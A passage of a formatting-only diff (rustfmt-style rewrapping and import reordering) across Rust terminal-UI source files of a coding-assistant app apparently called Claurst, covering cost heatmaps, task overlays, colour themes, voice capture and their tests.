             let y = chart_area.y + chart_area.height - 1 - row;
@@ -552,11 +638,18 @@ fn render_daily_tokens(data: &AggregatedStats, range_days: u32, area: Rect, buf:
 
 fn render_cost_heatmap(data: &AggregatedStats, area: Rect, buf: &mut Buffer) {
     if data.daily_costs.is_empty() {
-        Paragraph::new("No cost data yet.").style(Style::default().fg(Color::DarkGray)).render(area, buf);
+        Paragraph::new("No cost data yet.")
+            .style(Style::default().fg(Color::DarkGray))
+            .render(area, buf);
         return;
     }
 
-    let max_cost = data.daily_costs.values().cloned().fold(0.0_f64, f64::max).max(0.01);
+    let max_cost = data
+        .daily_costs
+        .values()
+        .cloned()
+        .fold(0.0_f64, f64::max)
+        .max(0.01);
 
     // Header legend
     Paragraph::new(Line::from(vec![
@@ -571,12 +664,21 @@ fn render_cost_heatmap(data: &AggregatedStats, area: Rect, buf: &mut Buffer) {
         Span::styled("\u{25a0}", Style::default().fg(Color::Rgb(0, 200, 0))),
         Span::styled(" high ", Style::default().fg(Color::DarkGray)),
         Span::styled("\u{25a0}", Style::default().fg(Color::Rgb(0, 255, 0))),
-    ])).render(Rect { x: area.x, y: area.y, width: area.width, height: 1 }, buf);
+    ]))
+    .render(
+        Rect {
+            x: area.x,
+            y: area.y,
+            width: area.width,
+            height: 1,
+        },
+        buf,
+    );
 
     // Weekday labels column (Mon..Sun order)
     let weekday_labels = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"];
     let heatmap_area = Rect {
-        x: area.x + 4,   // leave 4 cols for "Mon" etc.
+        x: area.x + 4, // leave 4 cols for "Mon" etc.
         y: area.y + 2,
         width: area.width.saturating_sub(4),
         height: area.height.saturating_sub(3),
@@ -584,10 +686,22 @@ fn render_cost_heatmap(data: &AggregatedStats, area: Rect, buf: &mut Buffer) {
 
     for (i, label) in weekday_labels.iter().enumerate() {
         let y = heatmap_area.y + i as u16;
-        if y >= heatmap_area.y + heatmap_area.height { break; }
-        Paragraph::new(Line::from(vec![
-            Span::styled(label.to_string(), Style::default().fg(Color::DarkGray)),
-        ])).render(Rect { x: area.x, y, width: 3, height: 1 }, buf);
+        if y >= heatmap_area.y + heatmap_area.height {
+            break;
+        }
+        Paragraph::new(Line::from(vec![Span::styled(
+            label.to_string(),
+            Style::default().fg(Color::DarkGray),
+        )]))
+        .render(
+            Rect {
+                x: area.x,
+                y,
+                width: 3,
+                height: 1,
+            },
+            buf,
+        );
     }
 
     // 12 weeks x 7 days grid — sorted ascending, display newest on right
@@ -601,14 +715,22 @@ fn render_cost_heatmap(data: &AggregatedStats, area: Rect, buf: &mut Buffer) {
     // and place week columns right-to-left from the most-recent week.
     let chunks: Vec<_> = sorted_dates.chunks(7).collect();
     let total_chunks = chunks.len();
-    let start_chunk = if total_chunks > 12 { total_chunks - 12 } else { 0 };
+    let start_chunk = if total_chunks > 12 {
+        total_chunks - 12
+    } else {
+        0
+    };
 
     for (display_col, chunk) in chunks[start_chunk..].iter().enumerate() {
         let x = heatmap_area.x + display_col as u16 * 2;
-        if x >= heatmap_area.x + heatmap_area.width { break; }
+        if x >= heatmap_area.x + heatmap_area.width {
+            break;
+        }
         for (day_idx, (_, cost)) in chunk.iter().enumerate() {
             let y = heatmap_area.y + day_idx as u16;
-            if y >= heatmap_area.y + heatmap_area.height { break; }
+            if y >= heatmap_area.y + heatmap_area.height {
+                break;
+            }
             let intensity = (*cost / max_cost).min(1.0);
             let color = heatmap_color(intensity);
             let cell = buf.cell_mut((x, y));
@@ -650,28 +772,29 @@ fn render_models(state: &StatsDialogState, area: Rect, buf: &mut Buffer) {
     let mut lines: Vec<Line> = Vec::new();
 
     // Table header
-    lines.push(Line::from(vec![
-        Span::styled(
-            format!("{:<42} {:>12} {:>13} {:>10}", "Model", "Input", "Output", "Cost"),
-            Style::default().fg(Color::DarkGray).add_modifier(Modifier::BOLD),
+    lines.push(Line::from(vec![Span::styled(
+        format!(
+            "{:<42} {:>12} {:>13} {:>10}",
+            "Model", "Input", "Output", "Cost"
         ),
-    ]));
+        Style::default()
+            .fg(Color::DarkGray)
+            .add_modifier(Modifier::BOLD),
+    )]));
     // Separator
-    lines.push(Line::from(vec![
-        Span::styled(
-            "\u{2500}".repeat(area.width.saturating_sub(2) as usize),
-            Style::default().fg(Color::DarkGray),
-        ),
-    ]));
+    lines.push(Line::from(vec![Span::styled(
+        "\u{2500}".repeat(area.width.saturating_sub(2) as usize),
+        Style::default().fg(Color::DarkGray),
+    )]));
 
     let mut total_input: u64 = 0;
     let mut total_output: u64 = 0;
     let mut total_cost: f64 = 0.0;
 
     for entry in &state.model_breakdown {
-        total_input  += entry.input_tokens;
+        total_input += entry.input_tokens;
         total_output += entry.output_tokens;
-        total_cost   += entry.cost_usd;
+        total_cost += entry.cost_usd;
 
         // Truncate long model IDs
         let model_display = if entry.model_id.len() > 42 {
@@ -701,28 +824,34 @@ fn render_models(state: &StatsDialogState, area: Rect, buf: &mut Buffer) {
     }
 
     // Grand total separator + row
-    lines.push(Line::from(vec![
-        Span::styled(
-            "\u{2500}".repeat(area.width.saturating_sub(2) as usize),
-            Style::default().fg(Color::DarkGray),
-        ),
-    ]));
+    lines.push(Line::from(vec![Span::styled(
+        "\u{2500}".repeat(area.width.saturating_sub(2) as usize),
+        Style::default().fg(Color::DarkGray),
+    )]));
     lines.push(Line::from(vec![
         Span::styled(
             format!("{:<42} ", "TOTAL"),
-            Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::White)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
             format!("{:>12} ", format_tokens(total_input)),
-            Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::White)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
             format!("{:>13} ", format_tokens(total_output)),
-            Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::White)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
             format!("{:>9}", format!("${:.4}", total_cost)),
-            Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::Yellow)
+                .add_modifier(Modifier::BOLD),
         ),
     ]));
 
@@ -734,10 +863,15 @@ fn render_models(state: &StatsDialogState, area: Rect, buf: &mut Buffer) {
 // ---------------------------------------------------------------------------
 
 fn format_tokens(n: u64) -> String {
-    if n >= 1_000_000 { format!("{:.1}M", n as f64 / 1_000_000.0) }
-    else if n >= 10_000 { format!("{:.0}K", n as f64 / 1_000.0) }
-    else if n >= 1_000 { format!("{:.1}K", n as f64 / 1_000.0) }
-    else { n.to_string() }
+    if n >= 1_000_000 {
+        format!("{:.1}M", n as f64 / 1_000_000.0)
+    } else if n >= 10_000 {
+        format!("{:.0}K", n as f64 / 1_000.0)
+    } else if n >= 1_000 {
+        format!("{:.1}K", n as f64 / 1_000.0)
+    } else {
+        n.to_string()
+    }
 }
 
 // ---------------------------------------------------------------------------
@@ -797,13 +931,17 @@ mod tests {
     #[test]
     fn test_add_model_usage_multiple_models() {
         let state = make_state_with_models(&[
-            ("claude-3-opus",   1000, 500, 0.05),
-            ("claude-3-haiku",  500,  200, 0.01),
-            ("claude-3-sonnet", 800,  400, 0.03),
+            ("claude-3-opus", 1000, 500, 0.05),
+            ("claude-3-haiku", 500, 200, 0.01),
+            ("claude-3-sonnet", 800, 400, 0.03),
         ]);
 
         assert_eq!(state.model_breakdown.len(), 3);
-        let ids: Vec<&str> = state.model_breakdown.iter().map(|e| e.model_id.as_str()).collect();
+        let ids: Vec<&str> = state
+            .model_breakdown
+            .iter()
+            .map(|e| e.model_id.as_str())
+            .collect();
         assert!(ids.contains(&"claude-3-opus"));
         assert!(ids.contains(&"claude-3-haiku"));
         assert!(ids.contains(&"claude-3-sonnet"));
@@ -813,13 +951,13 @@ mod tests {
     fn test_model_breakdown_totals() {
         let state = make_state_with_models(&[
             ("model-a", 1_000_000, 200_000, 1.00),
-            ("model-b",   500_000, 100_000, 0.50),
+            ("model-b", 500_000, 100_000, 0.50),
         ]);
-        let total_input: u64  = state.model_breakdown.iter().map(|e| e.input_tokens).sum();
+        let total_input: u64 = state.model_breakdown.iter().map(|e| e.input_tokens).sum();
         let total_output: u64 = state.model_breakdown.iter().map(|e| e.output_tokens).sum();
-        let total_cost: f64   = state.model_breakdown.iter().map(|e| e.cost_usd).sum();
-        assert_eq!(total_input,  1_500_000);
-        assert_eq!(total_output,   300_000);
+        let total_cost: f64 = state.model_breakdown.iter().map(|e| e.cost_usd).sum();
+        assert_eq!(total_input, 1_500_000);
+        assert_eq!(total_output, 300_000);
         assert!((total_cost - 1.50).abs() < 1e-9);
     }
 
@@ -837,8 +975,11 @@ mod tests {
     fn test_streak_gap_resets_current() {
         // Two separate runs: 3 days then a gap, then 2 days.
         let agg = make_agg_with_dates(&[
-            "2025-01-01", "2025-01-02", "2025-01-03",
-            "2025-01-10", "2025-01-11",
+            "2025-01-01",
+            "2025-01-02",
+            "2025-01-03",
+            "2025-01-10",
+            "2025-01-11",
         ]);
         let (current, longest) = compute_streaks(&agg);
         assert_eq!(current, 2);
@@ -865,7 +1006,11 @@ mod tests {
     fn test_streak_longer_tail_wins_longest() {
         // Five days, then a gap, then one day.
         let agg = make_agg_with_dates(&[
-            "2025-02-01", "2025-02-02", "2025-02-03", "2025-02-04", "2025-02-05",
+            "2025-02-01",
+            "2025-02-02",
+            "2025-02-03",
+            "2025-02-04",
+            "2025-02-05",
             "2025-02-20",
         ]);
         let (current, longest) = compute_streaks(&agg);
@@ -904,9 +1049,33 @@ mod tests {
     #[test]
     fn test_build_model_breakdown_sorted_by_cost_desc() {
         let mut agg = AggregatedStats::default();
-        agg.by_model.insert("cheap".to_string(),     ModelStats { input_tokens: 100, output_tokens: 50, cost_cents:  10.0, turns: 1 });
-        agg.by_model.insert("expensive".to_string(), ModelStats { input_tokens: 200, output_tokens: 100, cost_cents: 500.0, turns: 2 });
-        agg.by_model.insert("mid".to_string(),       ModelStats { input_tokens: 150, output_tokens: 75, cost_cents:  100.0, turns: 1 });
+        agg.by_model.insert(
+            "cheap".to_string(),
+            ModelStats {
+                input_tokens: 100,
+                output_tokens: 50,
+                cost_cents: 10.0,
+                turns: 1,
+            },
+        );
+        agg.by_model.insert(
+            "expensive".to_string(),
+            ModelStats {
+                input_tokens: 200,
+                output_tokens: 100,
+                cost_cents: 500.0,
+                turns: 2,
+            },
+        );
+        agg.by_model.insert(
+            "mid".to_string(),
+            ModelStats {
+                input_tokens: 150,
+                output_tokens: 75,
+                cost_cents: 100.0,
+                turns: 1,
+            },
+        );
 
         let breakdown = build_model_breakdown(&agg);
         assert_eq!(breakdown[0].model_id, "expensive");

--- a/src-rust/crates/tui/src/tasks_overlay.rs
+++ b/src-rust/crates/tui/src/tasks_overlay.rs
@@ -18,8 +18,8 @@ use ratatui::Frame;
 use std::sync::Arc;
 
 use crate::overlays::centered_rect;
-use claurst_tools::TaskStatus;
 use chrono;
+use claurst_tools::TaskStatus;
 
 // ---------------------------------------------------------------------------
 // Helper functions for TaskStatus (defined in cc_tools)
@@ -43,7 +43,9 @@ pub fn next_status(status: &TaskStatus) -> TaskStatus {
     match status {
         TaskStatus::Pending => TaskStatus::InProgress,
         TaskStatus::InProgress => TaskStatus::Completed,
-        TaskStatus::Completed | TaskStatus::Running | TaskStatus::Failed | TaskStatus::Deleted => TaskStatus::Pending,
+        TaskStatus::Completed | TaskStatus::Running | TaskStatus::Failed | TaskStatus::Deleted => {
+            TaskStatus::Pending
+        }
     }
 }
 
@@ -105,7 +107,10 @@ impl TasksOverlay {
     ///
     /// This should be called periodically (e.g., every frame) to keep the
     /// overlay in sync with the global task state.
-    pub fn refresh_tasks(&mut self, task_store: &Arc<dashmap::DashMap<String, claurst_tools::Task>>) {
+    pub fn refresh_tasks(
+        &mut self,
+        task_store: &Arc<dashmap::DashMap<String, claurst_tools::Task>>,
+    ) {
         self.tasks.clear();
 
         for entry in task_store.iter() {
@@ -214,7 +219,11 @@ impl TasksOverlay {
 
     /// Get statistics for the title bar.
     fn stats(&self) -> (usize, usize, usize) {
-        let pending = self.tasks.iter().filter(|t| matches!(t.status, TaskStatus::Pending)).count();
+        let pending = self
+            .tasks
+            .iter()
+            .filter(|t| matches!(t.status, TaskStatus::Pending))
+            .count();
         let in_progress = self
             .tasks
             .iter()
@@ -253,8 +262,10 @@ pub fn render_tasks_overlay(frame: &mut Frame, overlay: &TasksOverlay, area: Rec
 
     // Get statistics for title
     let (pending, in_progress, completed) = overlay.stats();
-    let title_text = format!("Tasks ({} pending, {} in_progress, {} completed)",
-                             pending, in_progress, completed);
+    let title_text = format!(
+        "Tasks ({} pending, {} in_progress, {} completed)",
+        pending, in_progress, completed
+    );
 
     let block = Block::default()
         .borders(Borders::ALL)
@@ -282,7 +293,8 @@ pub fn render_tasks_overlay(frame: &mut Frame, overlay: &TasksOverlay, area: Rec
         let viewport_height = inner.height as usize;
         let end_idx = (overlay.scroll_offset as usize + viewport_height).min(overlay.tasks.len());
 
-        for (i, task) in overlay.tasks
+        for (i, task) in overlay
+            .tasks
             .iter()
             .enumerate()
             .skip(overlay.scroll_offset as usize)
@@ -321,7 +333,9 @@ pub fn render_tasks_overlay(frame: &mut Frame, overlay: &TasksOverlay, area: Rec
         if end_idx < overlay.tasks.len() {
             lines.push(Line::from(Span::styled(
                 "  ... more tasks below",
-                Style::default().fg(Color::DarkGray).add_modifier(Modifier::ITALIC),
+                Style::default()
+                    .fg(Color::DarkGray)
+                    .add_modifier(Modifier::ITALIC),
             )));
         }
     }

--- a/src-rust/crates/tui/src/theme_colors.rs
+++ b/src-rust/crates/tui/src/theme_colors.rs
@@ -49,9 +49,9 @@ impl ColorPalette {
     /// Default Claurst theme
     fn default_theme() -> Self {
         Self {
-            error: Color::Rgb(255, 87, 51),        // Bright red-orange
-            success: Color::Rgb(76, 175, 80),      // Green
-            warning: Color::Rgb(255, 152, 0),      // Orange
+            error: Color::Rgb(255, 87, 51),   // Bright red-orange
+            success: Color::Rgb(76, 175, 80), // Green
+            warning: Color::Rgb(255, 152, 0), // Orange
             info: Color::Cyan,
             action: Color::Cyan,
             disabled: Color::DarkGray,
@@ -66,10 +66,10 @@ impl ColorPalette {
     /// Dark theme
     fn dark() -> Self {
         Self {
-            error: Color::Rgb(239, 83, 80),        // Light red
-            success: Color::Rgb(129, 199, 132),    // Light green
-            warning: Color::Rgb(255, 171, 64),     // Light orange
-            info: Color::Rgb(100, 181, 246),       // Light blue
+            error: Color::Rgb(239, 83, 80),     // Light red
+            success: Color::Rgb(129, 199, 132), // Light green
+            warning: Color::Rgb(255, 171, 64),  // Light orange
+            info: Color::Rgb(100, 181, 246),    // Light blue
             action: Color::Rgb(100, 181, 246),
             disabled: Color::Rgb(97, 97, 97),
             accent: Color::Rgb(100, 181, 246),
@@ -83,10 +83,10 @@ impl ColorPalette {
     /// Light theme
     fn light() -> Self {
         Self {
-            error: Color::Rgb(211, 47, 47),        // Dark red
-            success: Color::Rgb(27, 94, 32),       // Dark green
-            warning: Color::Rgb(230, 124, 13),     // Dark orange
-            info: Color::Rgb(13, 71, 161),         // Dark blue
+            error: Color::Rgb(211, 47, 47),    // Dark red
+            success: Color::Rgb(27, 94, 32),   // Dark green
+            warning: Color::Rgb(230, 124, 13), // Dark orange
+            info: Color::Rgb(13, 71, 161),     // Dark blue
             action: Color::Blue,
             disabled: Color::Rgb(189, 189, 189),
             accent: Color::Blue,
@@ -100,10 +100,10 @@ impl ColorPalette {
     /// Solarized Dark theme
     fn solarized() -> Self {
         Self {
-            error: Color::Rgb(220, 50, 47),        // Solarized red
-            success: Color::Rgb(133, 153, 0),      // Solarized green
-            warning: Color::Rgb(181, 137, 0),      // Solarized yellow
-            info: Color::Rgb(38, 139, 210),        // Solarized blue
+            error: Color::Rgb(220, 50, 47),   // Solarized red
+            success: Color::Rgb(133, 153, 0), // Solarized green
+            warning: Color::Rgb(181, 137, 0), // Solarized yellow
+            info: Color::Rgb(38, 139, 210),   // Solarized blue
             action: Color::Rgb(38, 139, 210),
             disabled: Color::Rgb(88, 110, 117),
             accent: Color::Rgb(38, 139, 210),
@@ -117,10 +117,10 @@ impl ColorPalette {
     /// Nord theme
     fn nord() -> Self {
         Self {
-            error: Color::Rgb(191, 97, 106),       // Nord red
-            success: Color::Rgb(163, 190, 140),    // Nord green
-            warning: Color::Rgb(235, 203, 139),    // Nord yellow
-            info: Color::Rgb(136, 192, 208),       // Nord blue
+            error: Color::Rgb(191, 97, 106),    // Nord red
+            success: Color::Rgb(163, 190, 140), // Nord green
+            warning: Color::Rgb(235, 203, 139), // Nord yellow
+            info: Color::Rgb(136, 192, 208),    // Nord blue
             action: Color::Rgb(136, 192, 208),
             disabled: Color::Rgb(76, 86, 106),
             accent: Color::Rgb(136, 192, 208),
@@ -134,10 +134,10 @@ impl ColorPalette {
     /// Dracula theme
     fn dracula() -> Self {
         Self {
-            error: Color::Rgb(255, 85, 85),        // Dracula red
-            success: Color::Rgb(80, 250, 123),     // Dracula green
-            warning: Color::Rgb(241, 250, 140),    // Dracula yellow
-            info: Color::Rgb(139, 233, 253),       // Dracula blue
+            error: Color::Rgb(255, 85, 85),     // Dracula red
+            success: Color::Rgb(80, 250, 123),  // Dracula green
+            warning: Color::Rgb(241, 250, 140), // Dracula yellow
+            info: Color::Rgb(139, 233, 253),    // Dracula blue
             action: Color::Rgb(139, 233, 253),
             disabled: Color::Rgb(98, 114, 164),
             accent: Color::Rgb(139, 233, 253),
@@ -151,10 +151,10 @@ impl ColorPalette {
     /// Monokai theme
     fn monokai() -> Self {
         Self {
-            error: Color::Rgb(249, 38, 114),       // Monokai magenta (used for errors)
-            success: Color::Rgb(166, 226, 46),     // Monokai green
-            warning: Color::Rgb(253, 151, 31),     // Monokai orange
-            info: Color::Rgb(102, 217, 239),       // Monokai cyan
+            error: Color::Rgb(249, 38, 114), // Monokai magenta (used for errors)
+            success: Color::Rgb(166, 226, 46), // Monokai green
+            warning: Color::Rgb(253, 151, 31), // Monokai orange
+            info: Color::Rgb(102, 217, 239), // Monokai cyan
             action: Color::Rgb(102, 217, 239),
             disabled: Color::Rgb(117, 113, 94),
             accent: Color::Rgb(102, 217, 239),
@@ -169,13 +169,13 @@ impl ColorPalette {
     /// Uses blue, yellow, and gray to avoid red/green distinction
     fn deuteranopia() -> Self {
         Self {
-            error: Color::Rgb(255, 140, 0),        // Orange (not red)
-            success: Color::Rgb(0, 150, 200),      // Blue (not green)
-            warning: Color::Rgb(255, 180, 0),      // Gold/Yellow
+            error: Color::Rgb(255, 140, 0),   // Orange (not red)
+            success: Color::Rgb(0, 150, 200), // Blue (not green)
+            warning: Color::Rgb(255, 180, 0), // Gold/Yellow
             info: Color::Cyan,
-            action: Color::Rgb(0, 150, 200),       // Blue action buttons
-            disabled: Color::Rgb(120, 120, 120),   // Neutral gray
-            accent: Color::Rgb(0, 150, 200),       // Blue accent
+            action: Color::Rgb(0, 150, 200), // Blue action buttons
+            disabled: Color::Rgb(120, 120, 120), // Neutral gray
+            accent: Color::Rgb(0, 150, 200), // Blue accent
             secondary_accent: Color::Rgb(180, 140, 255), // Purple accent
             text_light: Color::Rgb(220, 220, 220),
             text_dark: Color::Rgb(40, 40, 40),

--- a/src-rust/crates/tui/src/theme_screen.rs
+++ b/src-rust/crates/tui/src/theme_screen.rs
@@ -116,12 +116,7 @@ fn builtin_themes() -> Vec<ThemeOption> {
             name: "light".to_string(),
             label: "Light".to_string(),
             description: "Light background with dark text".to_string(),
-            swatch: [
-                Color::White,
-                Color::Blue,
-                Color::DarkGray,
-                Color::Black,
-            ],
+            swatch: [Color::White, Color::Blue, Color::DarkGray, Color::Black],
         },
         ThemeOption {
             name: "solarized".to_string(),
@@ -173,8 +168,8 @@ fn builtin_themes() -> Vec<ThemeOption> {
             description: "Red-green color blind friendly — blue/yellow/gray palette".to_string(),
             swatch: [
                 Color::Rgb(18, 18, 18),
-                Color::Rgb(0, 122, 204),  // Blue
-                Color::Rgb(255, 180, 0),  // Gold/Yellow
+                Color::Rgb(0, 122, 204),   // Blue
+                Color::Rgb(255, 180, 0),   // Gold/Yellow
                 Color::Rgb(200, 200, 200), // Light gray
             ],
         },
@@ -208,9 +203,21 @@ pub fn render_theme_screen(frame: &mut Frame, screen: &ThemeScreen, area: Rect) 
 
     for (i, theme) in screen.themes.iter().enumerate() {
         let is_selected = i == screen.selected_idx;
-        let bg = if is_selected { CLAURST_ACCENT } else { CLAURST_PANEL_BG };
-        let fg = if is_selected { Color::White } else { CLAURST_TEXT };
-        let desc_fg = if is_selected { Color::Rgb(248, 220, 236) } else { CLAURST_MUTED };
+        let bg = if is_selected {
+            CLAURST_ACCENT
+        } else {
+            CLAURST_PANEL_BG
+        };
+        let fg = if is_selected {
+            Color::White
+        } else {
+            CLAURST_TEXT
+        };
+        let desc_fg = if is_selected {
+            Color::Rgb(248, 220, 236)
+        } else {
+            CLAURST_MUTED
+        };
 
         // Build the swatch using block characters with background colour
         let swatch_spans: Vec<Span> = theme
@@ -247,7 +254,9 @@ pub fn render_theme_screen(frame: &mut Frame, screen: &ThemeScreen, area: Rect) 
     frame.render_widget(
         Paragraph::new(Line::from(vec![Span::styled(
             " ↑↓ navigate  ·  enter apply  ·  esc cancel",
-            Style::default().fg(CLAURST_MUTED).add_modifier(Modifier::ITALIC),
+            Style::default()
+                .fg(CLAURST_MUTED)
+                .add_modifier(Modifier::ITALIC),
         )])),
         layout.footer_area,
     );

--- a/src-rust/crates/tui/src/transcript_turn.rs
+++ b/src-rust/crates/tui/src/transcript_turn.rs
@@ -51,10 +51,7 @@ impl<'a> TranscriptTurn<'a> {
 }
 
 pub fn reasoning_heading(text: &str) -> Option<String> {
-    let first = text
-        .lines()
-        .map(str::trim)
-        .find(|line| !line.is_empty())?;
+    let first = text.lines().map(str::trim).find(|line| !line.is_empty())?;
 
     let cleaned = first
         .trim_start_matches(['#', '*', '-', '>', ' '])
@@ -64,10 +61,7 @@ pub fn reasoning_heading(text: &str) -> Option<String> {
         return None;
     }
 
-    let collapsed = cleaned
-        .split_whitespace()
-        .collect::<Vec<_>>()
-        .join(" ");
+    let collapsed = cleaned.split_whitespace().collect::<Vec<_>>().join(" ");
     if collapsed.is_empty() {
         return None;
     }
@@ -167,7 +161,11 @@ pub fn build_transcript_turns(app: &App) -> Vec<TranscriptTurn<'_>> {
             last.live_thinking = Some(app.streaming_thinking.as_str());
         }
 
-        last.active = app.is_streaming || last.tool_blocks.iter().any(|block| block.status == ToolStatus::Running);
+        last.active = app.is_streaming
+            || last
+                .tool_blocks
+                .iter()
+                .any(|block| block.status == ToolStatus::Running);
     }
 
     turns

--- a/src-rust/crates/tui/src/virtual_list.rs
+++ b/src-rust/crates/tui/src/virtual_list.rs
@@ -292,7 +292,10 @@ impl<T: VirtualItem> VirtualList<T> {
     /// Scroll to the next search match after `current_idx`.
     pub fn next_match(&mut self, query: &str, current_idx: usize, width: u16) -> Option<usize> {
         let matches = self.find_matches(query).to_vec();
-        let next = matches.iter().find(|&&i| i > current_idx).copied()
+        let next = matches
+            .iter()
+            .find(|&&i| i > current_idx)
+            .copied()
             .or_else(|| matches.first().copied());
         if let Some(idx) = next {
             self.scroll_to_index(idx, width);
@@ -303,7 +306,11 @@ impl<T: VirtualItem> VirtualList<T> {
     /// Scroll to the previous search match before `current_idx`.
     pub fn prev_match(&mut self, query: &str, current_idx: usize, width: u16) -> Option<usize> {
         let matches = self.find_matches(query).to_vec();
-        let prev = matches.iter().rev().find(|&&i| i < current_idx).copied()
+        let prev = matches
+            .iter()
+            .rev()
+            .find(|&&i| i < current_idx)
+            .copied()
             .or_else(|| matches.last().copied());
         if let Some(idx) = prev {
             self.scroll_to_index(idx, width);
@@ -313,5 +320,7 @@ impl<T: VirtualItem> VirtualList<T> {
 }
 
 impl<T: VirtualItem> Default for VirtualList<T> {
-    fn default() -> Self { Self::new() }
+    fn default() -> Self {
+        Self::new()
+    }
 }

--- a/src-rust/crates/tui/src/voice_capture.rs
+++ b/src-rust/crates/tui/src/voice_capture.rs
@@ -20,8 +20,8 @@ use std::sync::{Arc, Mutex};
 // ---------------------------------------------------------------------------
 
 pub use claurst_core::voice::{
-    VoiceAvailability, VoiceConfig, VoiceEvent, VoiceRecorder as CoreVoiceRecorder,
-    check_voice_availability, global_voice_recorder,
+    check_voice_availability, global_voice_recorder, VoiceAvailability, VoiceConfig, VoiceEvent,
+    VoiceRecorder as CoreVoiceRecorder,
 };
 
 // ---------------------------------------------------------------------------
@@ -189,11 +189,11 @@ pub fn samples_to_wav_bytes(samples: &[f32], sample_rate: u32) -> Vec<u8> {
     // fmt chunk
     buf.extend_from_slice(b"fmt ");
     buf.extend_from_slice(&16u32.to_le_bytes()); // chunk size
-    buf.extend_from_slice(&1u16.to_le_bytes());  // PCM audio format
-    buf.extend_from_slice(&1u16.to_le_bytes());  // mono
+    buf.extend_from_slice(&1u16.to_le_bytes()); // PCM audio format
+    buf.extend_from_slice(&1u16.to_le_bytes()); // mono
     buf.extend_from_slice(&sample_rate.to_le_bytes());
     buf.extend_from_slice(&byte_rate.to_le_bytes());
-    buf.extend_from_slice(&2u16.to_le_bytes());  // block align (1 ch × 2 bytes)
+    buf.extend_from_slice(&2u16.to_le_bytes()); // block align (1 ch × 2 bytes)
     buf.extend_from_slice(&16u16.to_le_bytes()); // bits per sample
 
     // data chunk
@@ -243,11 +243,7 @@ pub async fn transcribe(wav_bytes: Vec<u8>, api_key: &str) -> anyhow::Result<Str
     let status = response.status();
     if !status.is_success() {
         let body = response.text().await.unwrap_or_default();
-        return Err(anyhow::anyhow!(
-            "Whisper API returned {}: {}",
-            status,
-            body
-        ));
+        return Err(anyhow::anyhow!("Whisper API returned {}: {}", status, body));
     }
 
     let json: serde_json::Value = response.json().await?;
@@ -266,7 +262,11 @@ pub fn resolve_api_key() -> Option<String> {
     std::env::var("OPENAI_API_KEY")
         .ok()
         .filter(|k| !k.is_empty())
-        .or_else(|| std::env::var("ANTHROPIC_API_KEY").ok().filter(|k| !k.is_empty()))
+        .or_else(|| {
+            std::env::var("ANTHROPIC_API_KEY")
+                .ok()
+                .filter(|k| !k.is_empty())
+        })
 }
 
 // ---------------------------------------------------------------------------

--- a/src-rust/crates/tui/src/voice_mode_notice.rs
+++ b/src-rust/crates/tui/src/voice_mode_notice.rs
@@ -56,7 +56,11 @@ impl VoiceModeNoticeState {
 
     /// Height the notice occupies (0 if not visible).
     pub fn height(&self) -> u16 {
-        if self.visible { 2 } else { 0 }
+        if self.visible {
+            2
+        } else {
+            0
+        }
     }
 }
 
@@ -98,16 +102,12 @@ pub fn render_voice_mode_notice(state: &VoiceModeNoticeState, area: Rect, buf: &
             ),
             Span::styled(
                 "/voice",
-                Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD),
+                Style::default()
+                    .fg(Color::Cyan)
+                    .add_modifier(Modifier::BOLD),
             ),
-            Span::styled(
-                " to configure.  ",
-                Style::default().fg(Color::White),
-            ),
-            Span::styled(
-                "[Esc to dismiss]",
-                Style::default().fg(Color::DarkGray),
-            ),
+            Span::styled(" to configure.  ", Style::default().fg(Color::White)),
+            Span::styled("[Esc to dismiss]", Style::default().fg(Color::DarkGray)),
         ]),
         Line::from(""),
     ];
@@ -174,10 +174,20 @@ mod tests {
     fn voice_notice_render_smoke() {
         let mut state = VoiceModeNoticeState::new();
         state.show_if_available(true, false);
-        let area = Rect { x: 0, y: 0, width: 100, height: 4 };
+        let area = Rect {
+            x: 0,
+            y: 0,
+            width: 100,
+            height: 4,
+        };
         let mut buf = ratatui::buffer::Buffer::empty(area);
         render_voice_mode_notice(&state, area, &mut buf);
-        let rendered = buf.content.iter().map(|c| c.symbol()).collect::<Vec<_>>().join("");
+        let rendered = buf
+            .content
+            .iter()
+            .map(|c| c.symbol())
+            .collect::<Vec<_>>()
+            .join("");
         assert!(rendered.contains("Voice mode"));
         assert!(rendered.contains("Alt+V"));
     }
@@ -185,10 +195,20 @@ mod tests {
     #[test]
     fn voice_notice_not_rendered_when_invisible() {
         let state = VoiceModeNoticeState::new();
-        let area = Rect { x: 0, y: 0, width: 80, height: 4 };
+        let area = Rect {
+            x: 0,
+            y: 0,
+            width: 80,
+            height: 4,
+        };
         let mut buf = ratatui::buffer::Buffer::empty(area);
         render_voice_mode_notice(&state, area, &mut buf);
-        let rendered = buf.content.iter().map(|c| c.symbol()).collect::<Vec<_>>().join("");
+        let rendered = buf
+            .content
+            .iter()
+            .map(|c| c.symbol())
+            .collect::<Vec<_>>()
+            .join("");
         assert!(!rendered.contains("Voice"));
     }
 }

--- a/src-rust/crates/tui/tests/diff_viewer.rs
+++ b/src-rust/crates/tui/tests/diff_viewer.rs
@@ -28,7 +28,8 @@ fn parse_diff_returns_hunks() {
 #[test]
 fn parse_diff_has_added_lines() {
     let files = parse_unified_diff(SIMPLE_DIFF);
-    let added: Vec<_> = files.iter()
+    let added: Vec<_> = files
+        .iter()
         .flat_map(|f| f.hunks.iter())
         .flat_map(|h| h.lines.iter())
         .filter(|l| l.kind == DiffLineKind::Added)
@@ -41,7 +42,8 @@ fn parse_diff_has_added_lines() {
 #[test]
 fn parse_diff_has_removed_lines() {
     let files = parse_unified_diff(SIMPLE_DIFF);
-    let removed: Vec<_> = files.iter()
+    let removed: Vec<_> = files
+        .iter()
         .flat_map(|f| f.hunks.iter())
         .flat_map(|h| h.lines.iter())
         .filter(|l| l.kind == DiffLineKind::Removed)
@@ -54,7 +56,8 @@ fn parse_diff_has_removed_lines() {
 #[test]
 fn parse_diff_has_context_lines() {
     let files = parse_unified_diff(SIMPLE_DIFF);
-    let context: Vec<_> = files.iter()
+    let context: Vec<_> = files
